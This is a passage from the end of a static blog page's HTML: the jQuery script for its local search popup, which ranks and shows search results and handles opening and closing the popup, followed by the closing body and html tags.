            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
